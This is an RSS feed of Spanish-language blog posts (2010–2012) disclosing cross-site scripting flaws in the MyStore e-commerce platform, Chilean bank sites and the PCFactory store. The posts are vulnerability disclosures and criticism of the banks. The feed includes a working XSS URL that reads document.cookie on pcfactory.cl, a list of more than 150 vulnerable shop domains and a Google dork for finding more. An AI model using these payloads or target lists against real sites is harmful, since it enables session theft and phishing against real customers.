<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>El rincón de Zerial &#187; phishing</title>
	<atom:link href="http://blog.zerial.org/tag/phishing/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.zerial.org</link>
	<description>Informática, GNU/Linux, Seguridad, Hacking, Programación, Ocio</description>
	<lastBuildDate>Wed, 08 Feb 2012 20:48:54 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>MyStore vulnerable a Cross-Site Scripting: Miles de sitios afectados</title>
		<link>http://blog.zerial.org/seguridad/mystore-vulnerable-a-cross-site-scripting-miles-de-sitios-afectados/</link>
		<comments>http://blog.zerial.org/seguridad/mystore-vulnerable-a-cross-site-scripting-miles-de-sitios-afectados/#comments</comments>
		<pubDate>Wed, 19 Oct 2011 12:35:56 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[vulnerabilidad]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=2725</guid>
		<description><![CDATA[MyStore es una plataforma de comercio electrónico (eCommerce) escrita en PHP y utilizada por miles de sitios web. La plataforma tiene una vulnerabilidad Cross-Site Scripting en el archivo usado para desplegar errores al usuario, en el módulo de administración y es accesible por cualquier usuario sin previa autentificación, por lo que es posible explotar la [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2011/10/mystorelogo.png"><img class="aligncenter size-full wp-image-2727" title="mystorelogo" src="http://blog.zerial.org/wp-content/uploads/2011/10/mystorelogo.png" alt="" width="321" height="203" /></a>MyStore es una plataforma de comercio electrónico (eCommerce) escrita en PHP y utilizada por miles de sitios web. La plataforma tiene una vulnerabilidad Cross-Site Scripting en el archivo usado para desplegar errores al usuario, en el módulo de administración y es accesible por cualquier usuario sin previa autentificación, por lo que es posible explotar la vulnerabilidad y preparar un ataque hacia los clientes de los sitios web que implementan el sistema.</p>
<p>Según Google, son un poco más de mil sitios los que utilizan esta plataforma y que serían vulnerables a este tipo de ataques.</p>
<p>Al tratarse de un eCommerce, esta vulnerabilidad es aún más peligrosa ya que el atacante podría explotarla para obtener información de los usuarios como números de tarjetas de crédito, correos, usuarios y contraseñas, todo esto mediante <strong>phishing</strong>, usando el dominio del sitio en el que el usuario confía. Tambien se pueden elaborar ataques mas sofisticados para robar las sesiones a los usuarios que previamente hayan iniciado sesión.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2011/10/xss_mystore.png"><img class="aligncenter size-full wp-image-2731" title="xss_mystore" src="http://blog.zerial.org/wp-content/uploads/2011/10/xss_mystore.png" alt="" width="444" height="379" /></a></p>
<p><span id="more-2725"></span></p>
<p>La vulnearbilidad se encuentra en el archivo &#8220;<em>error.php</em>&#8221; y se produce al no filtrar los parametros de entrada mediante las variables &#8220;<em>p</em>&#8221; y &#8220;<em>s</em>&#8220;. El script simplemente imprime el valor de las variables, sin filtrarlas ni escapar caracteres, permitiendo XSS.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2011/10/xss_mystore2.png"><img class="aligncenter size-full wp-image-2732" title="xss_mystore2" src="http://blog.zerial.org/wp-content/uploads/2011/10/xss_mystore2.png" alt="" width="678" height="25" /></a></p>
<p>Una lista de algunos sitios afectados:</p>
<blockquote><p>abysinvitationsprintshop.com<br />
accesorioselauto.com<br />
adobetecnoterra.com<br />
adrenalinamotor.mx<br />
akarienlinea.com<br />
aldebaranuno.com<br />
aleissi.mx<br />
anabolicstorexpress.com<br />
ankah2o.com<br />
antibalastucomprasegura.com<br />
aquatica-online.com<br />
armarecuerdoseinvitaciones.com<br />
armyatvstore.com<br />
babybodega.mx<br />
bazar12.com<br />
beerandfashionmexico.com<br />
bellezanutritiva.com.mx<br />
bichitour.com<br />
bienesraicespremium.com<br />
bigjockey.com<br />
billyoplazapiel.com<br />
blancoscorona.com<br />
bricks-store.com<br />
cajasybolsas.com<br />
caramolli.com<br />
cavaboutique.com<br />
ceciliamartinezgarza.com<br />
centralnt.com<br />
colofoninfantil.com<br />
comercialdeestanteria.com.mx<br />
comerciantes.mx<br />
compraconplazo.com<br />
compupagos.com.mx<br />
compuventa-online.com<br />
contitech-solutions.com<br />
cosasdeingenieria.com<br />
decocuadros.com.mx<br />
dekocuadros.com<br />
deyacut.com<br />
digielectronik.com<br />
distribuidorazaqueo.com<br />
diveencounters.mx<br />
doshik.com<br />
e-tronic-shop.com<br />
edicionesuromex.com<br />
elgloborojotienda.com<br />
ellamodas.com<br />
elmundodelasfajas.com<br />
enac-audio.com<br />
enelbazarxalapa.com<br />
entradaxsalida.com<br />
enviamiregalo.com<br />
eplaza.com.mx<br />
fantasias-daniel.com<br />
farmaciadelnino.com<br />
fashion1services.com<br />
fastlapstore.com<br />
fermentando.com.mx<br />
florerialorena.com<br />
forjasdesign.com<br />
fraganciamania.com.mx<br />
fvi.mx<br />
gadgetmex.com<br />
galeriagalamania.com<br />
globaris-shop.com<br />
grupocomputacionaldeco.com<br />
grupoelrey.com<br />
gscomputadoras.com<br />
hogarynegocio.com<br />
hypnosefashionstore.com<br />
imperiusarts.com<br />
importacionesecm.com<br />
indumaqsa.com<br />
infoxweb.com<br />
inhaus.mx<br />
irrealcandybar.com<br />
its-acapulco.com<br />
javoil.com<br />
joyeriasagara.com<br />
julianna-jewelry.com<br />
kingmonstermty.com<br />
kiutstore.com<br />
konexionmusical.com<br />
lacombasoccer.com<br />
ladecimaletragdl.com<br />
lapsrepairs.com<br />
lasmatadoras.com<br />
libros.com.mx<br />
liderpowertools.com<br />
lizfloreria.com<br />
lunerougeboutique.com<br />
maimaitienda.com<br />
mandycreaciones.com<br />
manikin-online.com<br />
maniquiesonline.com<br />
maquinariaexpress.com<br />
megapixelcomputadoras.com<br />
mercaditoparati.com<br />
mexi-cali.net<br />
modayregalos.com<br />
mothernity.com.mx<br />
mtystore.com<br />
muebleriamaya.com<br />
mundoescolar11.com<br />
mydogpharma.com<br />
naturatoshop.com<br />
naturenmexico.com<br />
nochederio.com<br />
onlineplayeras.com<br />
ouletgnc.com<br />
pa-xi.com<br />
paraleer.com<br />
pasatiempo-juguetes.com<br />
petnc.com<br />
pinnacleventa.com<br />
plazamesonesvirtual.com<br />
pro-limp.com<br />
prodoorventas.com<br />
psmodelismo.com<br />
r3silencia.com<br />
raqmar.com.mx<br />
rcomunicaciones.com<br />
recuerdosybolos.com<br />
reducingbodysiluet.com<br />
regala123.com<br />
regala123.com.mx<br />
regalosconvida.com<br />
reguladoresypcs.com<br />
safetystoremexico.com<br />
seducelo.com<br />
seducelo.com.mx<br />
setfi.us.com<br />
sexylencerias.com<br />
shop4evermx.com<br />
siaproductos.com<br />
sistemascompac.com<br />
sitesirve.com<br />
smart-atic.com<br />
solarislabs.com<br />
solodebateria.com<br />
spixalapa.com<br />
sportjordan.com<br />
store-htpro.com<br />
sunlounge.com.mx<br />
taipacificoimportaciones.com<br />
techosmas.com<br />
tecnologiailimitada.com<br />
tenisclubcolombia.com<br />
thecellulardepot.com<br />
theredzone.com.mx<br />
tienda128.mystorexpress.com<br />
tienda573.mystorexpress.com<br />
tiendabolsasbichat.com<br />
tiendadicer.com<br />
tiendaenriko.com<br />
tiendaofficeadm.com<br />
tiendapetmark.com<br />
tiendatn.com<br />
tinkert.com<br />
todocompu.com<br />
transfermania.com.mx<br />
treneshodemexico.com<br />
treneshodetexas.com<br />
trovarti.com<br />
tucalentadordepaso.com.mx<br />
tumejorcompra.net<br />
tumueblebarato.com<br />
tumundodeportivo.com<br />
vinilium.com<br />
winemexsa.com</p></blockquote>
<p>Para buscar la lista completa de los sitios afectados, puedes realizar la siguiente busqueda en Google:</p>
<p><a href="http://www.google.com/search?q=inurl%3Amystore+inurl%3Aerror.php+filetype%3Aphp"><strong>inurl:mystore inurl:error.php filetype:php</strong></a></p>
<p>Tambien <a href="http://secureless.org/search/?keywords=mystore%2Ferror.php&#038;sid=0">se reportaron algunas vía secureless</a>.</p>
<p>La empresa que está detras de este sistema ya ha sido notificada.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fmystore-vulnerable-a-cross-site-scripting-miles-de-sitios-afectados%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/mystore-vulnerable-a-cross-site-scripting-miles-de-sitios-afectados/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/mystore-vulnerable-a-cross-site-scripting-miles-de-sitios-afectados/"  data-text="MyStore vulnerable a Cross-Site Scripting: Miles de sitios afectados" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/mystore-vulnerable-a-cross-site-scripting-miles-de-sitios-afectados/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Banco Central de Chile vulnerable a XSS</title>
		<link>http://blog.zerial.org/seguridad/banco-central-de-chile-vulnerable-a-xss/</link>
		<comments>http://blog.zerial.org/seguridad/banco-central-de-chile-vulnerable-a-xss/#comments</comments>
		<pubDate>Mon, 17 Oct 2011 14:43:57 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[banco central]]></category>
		<category><![CDATA[chile]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[sqli]]></category>
		<category><![CDATA[vulnerabilidad]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=2738</guid>
		<description><![CDATA[El sitio web del Banco Central de Chile es vulnerable a ataques Cross-Site Scripting y, posiblemente, un SQL Injection. Son muchos los sitios de bancos que son vulnerables a este tipo de ataques, pero muy pocos quienes solucionan los errores luego de reportarlos, es por eso que se toma la decisión de hacer un disclosure [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2011/10/logo_bcch.gif"><img class="aligncenter size-full wp-image-2740" title="logo_bcch" src="http://blog.zerial.org/wp-content/uploads/2011/10/logo_bcch.gif" alt="" width="139" height="139" /></a></p>
<p>El sitio web del Banco Central de Chile es vulnerable a ataques Cross-Site Scripting y, posiblemente, un SQL Injection. Son muchos los sitios de bancos que son vulnerables a este tipo de ataques, pero muy pocos quienes solucionan los errores luego de reportarlos, es por eso que se toma la decisión de hacer un <strong>disclosure</strong> sobre las vulnerabilidades para denunciar este tipo de hechos.</p>
<p>El sitio web del Banco Central pareciera no tener ningun tipo de validación de los parametros de entrada que se pasan mediante formularios o mediante URL, exponiendo a los usuarios  y al servidor a distintos tipos de ataques.<br />
El XSS que encontré, está en el archvo <strong>rim/default.asp</strong> en el subdominio <strong>si2.bcentral.cl</strong>.</p>
<p>Como prueba de concepto, incrustaré un &#8216;iframe&#8217; con el sitio web de Google dentro del sitio del Banco Central</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2011/10/bcentral_xss1.png"><img class="aligncenter size-full wp-image-2743" title="bcentral_xss1" src="http://blog.zerial.org/wp-content/uploads/2011/10/bcentral_xss1.png" alt="" width="583" height="593" /></a></p>
<p>Perfectamente, el atacante podría incrustar un sitio malicioso con la intención de robar la identidad del banco y aprovecharse de la confianza que el usuario tiene sobre el sitio web, incluso usando el sitio &#8220;<strong>seguro</strong>&#8220;.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2011/10/bcentral_xss2.png"><img class="aligncenter size-full wp-image-2744" title="bcentral_xss2" src="http://blog.zerial.org/wp-content/uploads/2011/10/bcentral_xss2.png" alt="" width="241" height="27" /></a>Tambien el atacante podria, mediante esta vulnerabilidad, modificar el formulario de inicio de sesión que aparece en la imagen, para robar los datos de los usuarios y enviar la información a terceros.</p>
<p><span id="more-2738"></span></p>
<p>La vulnerabilidad SQL Injection se presentaba en los formularios que estaban en la sección &#8220;Base de datos economicos&#8221;, que al parecer ya ha sido corregido.</p>
<p>Hace 7 días aproximadamente reporté la vulnerabilidad y como es de costumbre no otbuve ninguna respuesta, pero misteriosamente estan trabajando en estos momentos en corregir el sql injection.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fbanco-central-de-chile-vulnerable-a-xss%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/banco-central-de-chile-vulnerable-a-xss/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/banco-central-de-chile-vulnerable-a-xss/"  data-text="Banco Central de Chile vulnerable a XSS" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/banco-central-de-chile-vulnerable-a-xss/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>El Phishing y el Banco BBVA Chile</title>
		<link>http://blog.zerial.org/seguridad/el-phishing-y-el-banco-bbva-chile/</link>
		<comments>http://blog.zerial.org/seguridad/el-phishing-y-el-banco-bbva-chile/#comments</comments>
		<pubDate>Thu, 26 May 2011 00:58:24 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Privacidad]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[bancos]]></category>
		<category><![CDATA[bbva]]></category>
		<category><![CDATA[chile]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[secureless]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=2300</guid>
		<description><![CDATA[El banco BBVA Chile no se queda atras en sus vulnerabilidades y buscando donde poder reportarlas no he encontrado nada, solo teléfonos donde piden demasiada información personal. No hay ningun formulario ni correo electrónico, por lo que nuevamente se acude a la tecnica de la publicación. Al igual que lo comentado en el post de [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.zerial.org/wp-content/uploads/2011/05/BBVA-logo.jpg"><img class="aligncenter size-full wp-image-2301" title="BBVA-logo" src="http://blog.zerial.org/wp-content/uploads/2011/05/BBVA-logo.jpg" alt="" width="344" height="167" /></a></p>
<p>El banco BBVA Chile no se queda atras en sus vulnerabilidades y buscando donde poder reportarlas no he encontrado nada, solo teléfonos donde piden demasiada información personal. No hay ningun formulario ni correo electrónico, por lo que nuevamente se acude a la tecnica de la publicación.</p>
<p>Al igual que lo comentado en el post de <a href="http://blog.zerial.org/seguridad/el-phishing-y-el-banco-santander-chile/">El Phishing y el Banco Santander Chile</a>, la idea es dar a conocer como los bancos se lavan las manos con sus campañas anti phishing y anti fraudes, pero no son capaces de ofrecer una plataforma lo suficientemente robusta. Nuevamente este tipo de vulnerabilidades afectan a los usuarios y no al banco directamente, permitiendo el robo de credenciales e información personal, suplantación de identidad, etc.</p>
<p>La vulnerabilidad Cross-Site Scripting detectada se encuentra en la página principal del banco http://www.bbva.cl y corresponde al buscador.  El tipoco error de no <em>parsear</em> los parametros de entrada que se pasan por el forumlario o por URL (GET/POST).</p>
<p>La vulnerabilidad no ha sido reportada al banco ya que no se ha encontrado ningun método de contacto, pero se ha publicado en <a href="http://secureless.org">Secureless</a> junto <a href="http://www.secureless.org/search/?keywords=BBVA&amp;sid=0">al mismo tipo de vulnerabilidad correspondiente al BBVA de Colombia</a>.</p>
<p><span id="more-2300"></span></p>
<p>El script vulnerable corresponde a <strong>http://www.bbva.cl/tlch/jsp/ch/esp/meta/buscador/buscar.jsp</strong> que pasandole los parametros necesarios es posible ejecutar código javascript o html mediante la variable <strong>q</strong>.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2011/05/xss_poc.png"><img class="aligncenter size-full wp-image-2303" title="xss_poc" src="http://blog.zerial.org/wp-content/uploads/2011/05/xss_poc.png" alt="" width="518" height="280" /></a></p>
<p>Las <a href="http://www.bbva.cl/tlch/jsp/ch/esp/meta/minf/seg.jsp">politicas de seguridad</a> del banco dicen textualmente:</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2011/05/politicas.png"><img class="aligncenter size-full wp-image-2305" title="politicas" src="http://blog.zerial.org/wp-content/uploads/2011/05/politicas.png" alt="" width="541" height="360" /></a></p>
<p>Permitiendo este tipo de ataques (xss) el banco no está cumpliendo, ya que un atacante puede suplantar la identidad del sitio y abusar de la confianza que tiene el usuario/cliente en el sitio web del BBVA, pudiendo interceptar el tráfico, generar formularios falsos, redireccionar al usuario a sitios malignos, etc.</p>
<p>Nuevamente, este es un llamado para que <strong>los bancos se hagan cargo de este tipo de cosas!</strong></p>
<p><strong>Editado: (13 de Junio del 2011)</strong> La vulnerabilidad se encuentra corregida. El banco no respondio ningun email y tampoco dio ningun tipo de comunicado o mensaje al respecto.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-phishing-y-el-banco-bbva-chile%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/el-phishing-y-el-banco-bbva-chile/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/el-phishing-y-el-banco-bbva-chile/"  data-text="El Phishing y el Banco BBVA Chile" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/el-phishing-y-el-banco-bbva-chile/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>XSS y CSRF en sitios web de Bancos: Ellos mismos facilitan el phishing</title>
		<link>http://blog.zerial.org/seguridad/xss-y-csrf-en-sitios-web-de-bancos-ellos-mismos-facilitan-el-phishing/</link>
		<comments>http://blog.zerial.org/seguridad/xss-y-csrf-en-sitios-web-de-bancos-ellos-mismos-facilitan-el-phishing/#comments</comments>
		<pubDate>Mon, 02 May 2011 18:55:48 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Interes general]]></category>
		<category><![CDATA[Proyectos]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[bancos]]></category>
		<category><![CDATA[chile]]></category>
		<category><![CDATA[cross-site request forgery]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[csrf]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[secureless]]></category>
		<category><![CDATA[xsrf]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=2216</guid>
		<description><![CDATA[Se está poniendo de moda el phishing y el robo de datos bancarios para realizar transferencias no deseadas, cada vez son mas los usuarios afectados y muchos de ellos no logran recuperar su dinero, simplemente el banco no responde. Por un lado tienen razón, ya que quien entregó su información personal y privada fueron ellos [...]]]></description>
			<content:encoded><![CDATA[<p>Se está poniendo de moda el phishing y el robo de datos bancarios para realizar transferencias no deseadas, cada vez son mas los usuarios afectados y muchos de ellos no logran recuperar su dinero, simplemente el banco no responde. Por un lado tienen razón, ya que quien entregó su información personal y privada fueron ellos mismos, pocas veces este tipo de robos son debido a una falla/bug/vulnerabilidad que afecte directamente al banco.</p>
<p><img class="aligncenter size-full wp-image-2218" title="phishing" src="http://blog.zerial.org/wp-content/uploads/2011/05/phishing.jpg" alt="Imagen tomada de quejasyfraudes.info" width="265" height="270" />En Chile, los bancos tienen una campaña contra el phishing donde se limitan a entregar manuales y decir &#8220;no ingreses tus datos donde no debes&#8221;, pero realmente no se preocupan de tener mecanismos de validación y protección, permitiendo que cualquier persona pueda suplantar su identidad y usar la confianza que tiene el usuario en el sitio.<br />
Existe un sitio llamado &#8220;<a href="http://www.avispate.cl/">avispate.cl</a>&#8220;, que supuestamente es para hacer un llamado a la gente y educar para que no caigan en este tipo de trampas y no entreguen información a cualquier sitio.</p>
<p>Bien, por un lado tenemos que los usuarios entregan información a personas que no corresponden, que caen en las trampas pero por otro lado, algo que es <em>claramente</em> responsabilidad del banco: <strong>Hacer que sus sitios y sistemas sean 100% seguros!</strong></p>
<p><span id="more-2216"></span></p>
<p>Los bancos en lugar de ayudar a los usuarios y prevenir este tipo de ataques, prefieren cobrar:</p>
<p><img class="aligncenter size-full wp-image-2230" title="bbv1_planes" src="http://blog.zerial.org/wp-content/uploads/2011/05/bbv1_planes.png" alt="" width="529" height="330" /></p>
<p>En <a href="http://secureless.org"><strong>secureless</strong></a>, comenzamos a trabajar en una investigación en busca de vulnerabilidades XSS, CSRF y otras que puedan afectar directamente al usuario. Nuestro propósito es dejar en claro que los bancos deben ser competentes y responder por las fallas de seguridad que tienen. Hasta ahora, según nosotros, como este tipo de vulnerabilidades no les afecta a ellos, sino que afecta a los clientes, entonces no se preocupan lo suficiente.<br />
El proyecto consiste en publicar estas vulnerabilidades diariamente durante un par de dias, demostrar y dejar al descubierto este tipo de negligencia. Comenzaremos por Chile, luego seguiremos atacando bancos de otros paises.</p>
<p><strong>Sobre XSS y CSRF &#8230;</strong></p>
<p>Las vulnerabilidades <a href="http://es.wikipedia.org/wiki/XSS">XSS</a> permiten realizar modificaciones en los sitios web por el lado del cliente, cuando una entidad bancaria con certificado ssl (https) tiene este tipo de vulnerabilidad, se combierte en un sitio potencial para ser atacado y sus usuarios los afectados. Por ejemplo, si un sitio permite inyectar código html o javascript, facilmente podriamos poner un iframe que ocupe todo el ancho y alto del navegador, y que el usuario no se de cuenta que está visitando a otra página.</p>
<p>Por otro lado tenemos los ataques <a href="http://es.wikipedia.org/wiki/CSRF">CSRF</a>, que combinado con <a href="http://es.wikipedia.org/wiki/XSS">XSS</a>, practicamente es posible hacer lo que queramos con el usuario: llevarlo de un sitio a otro, pasar parametros de un sitio falso a uno verdadero, etc.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fxss-y-csrf-en-sitios-web-de-bancos-ellos-mismos-facilitan-el-phishing%2F&amp;layout=button_count&amp;show_faces=false&amp;width=85&amp;action=like&amp;font=verdana&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width=85px; height:21px;" allowTransparency="true"></iframe></div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<g:plusone size="medium" href="http://blog.zerial.org/seguridad/xss-y-csrf-en-sitios-web-de-bancos-ellos-mismos-facilitan-el-phishing/"></g:plusone>
			</div>
			<div style="float:left; width:85px;padding-right:10px; margin:4px 4px 4px 4px;height:30px;">
			<a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.zerial.org/seguridad/xss-y-csrf-en-sitios-web-de-bancos-ellos-mismos-facilitan-el-phishing/"  data-text="XSS y CSRF en sitios web de Bancos: Ellos mismos facilitan el phishing" data-count="horizontal" data-via="Zerial">Tweet</a>
			</div>			
			</div><div style="clear:both"></div><div style="padding-bottom:4px;"></div>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/xss-y-csrf-en-sitios-web-de-bancos-ellos-mismos-facilitan-el-phishing/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Cross-Site Scripting (XSS) en sitio web de PCFactory</title>
		<link>http://blog.zerial.org/seguridad/cross-site-scripting-xss-en-sitio-web-de-pcfactory/</link>
		<comments>http://blog.zerial.org/seguridad/cross-site-scripting-xss-en-sitio-web-de-pcfactory/#comments</comments>
		<pubDate>Thu, 12 Aug 2010 19:43:44 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[inseguridad]]></category>
		<category><![CDATA[pcfactory]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1814</guid>
		<description><![CDATA[Parece que fuese una moda de las tiendas de computación el ser vulnerable a XSS. Conocimos el caso de WEI y de SYM, ahora es el turno de PCFactory. Cuando descubrí el bug tenian una versión más antigua del sitio web, sin embargo, luego que la actualizaran a la version actual, me di cuenta que [...]]]></description>
			<content:encoded><![CDATA[<p>Parece que fuese una moda de las tiendas de computación el ser vulnerable a XSS. Conocimos el caso de <a href="http://blog.zerial.org/seguridad/xss-en-sitio-web-de-wei/">WEI</a> y de <a href="http://blog.zerial.org/seguridad/xss-en-sitio-web-de-sym-computacion/">SYM</a>, ahora es el turno de PCFactory.<br />
Cuando descubrí el bug tenian una versión más antigua del sitio web, sin embargo, luego que la actualizaran a la version actual, me di cuenta que la misma url seguia funcionando con el mismo bug, es decir, sólo fue un cambio en el estilo visual del sitio web, no fue ninguna mejora en cuanto a lógica y código.</p>
<p>Para variar, el bug se encuentra en el buscador, donde nos da la autoridad para inyectar código html y código javascript para ser ejecutado en el navegador del cliente:</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/08/pc_factory_cookie.png"><img class="aligncenter size-medium wp-image-1843" title="pc_factory_cookie" src="http://blog.zerial.org/wp-content/uploads/2010/08/pc_factory_cookie-300x157.png" alt="" width="300" height="157" /></a></p>
<p><span id="more-1814"></span></p>
<p>La vulnerabilidad fue alertada vía twitter, ya que no logré encontrar en ese entonces una dirección de correo.</p>
<p><img class="aligncenter size-full wp-image-1842" title="pc_factory_report" src="http://blog.zerial.org/wp-content/uploads/2010/08/pc_factory_report.png" alt="" width="485" height="227" /></p>
<p>Esta vulnerabilidad fue descubierta el 5 de Agosto y no descarto que alguien la haya encontrado antes.</p>
<p>La URL vulnerables es:</p>
<p><a href="http://pcfactory.cl/?buscar=\%22%3Etoe%3Cscript%3Ealert%28document.cookie%29%3C/script%3E" target="_blank">http://pcfactory.cl/?buscar=\%22%3Etoe%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</a></p>
<p>No está demas decir que los alcances de ésta vulnerabilidad no afectarian a la tienda en si, sólo a sus usuarios ya que podría ser usada para robo y suplantación de identidad (mediante las cookies de un usuario logeado) y ademas podría ser usado para ejecutar código arbitrario y redireccionar a los visitantes a algun sitio maligno.</p>
<div id="bottomcontainerBox" style="border:1px solid #808080;">
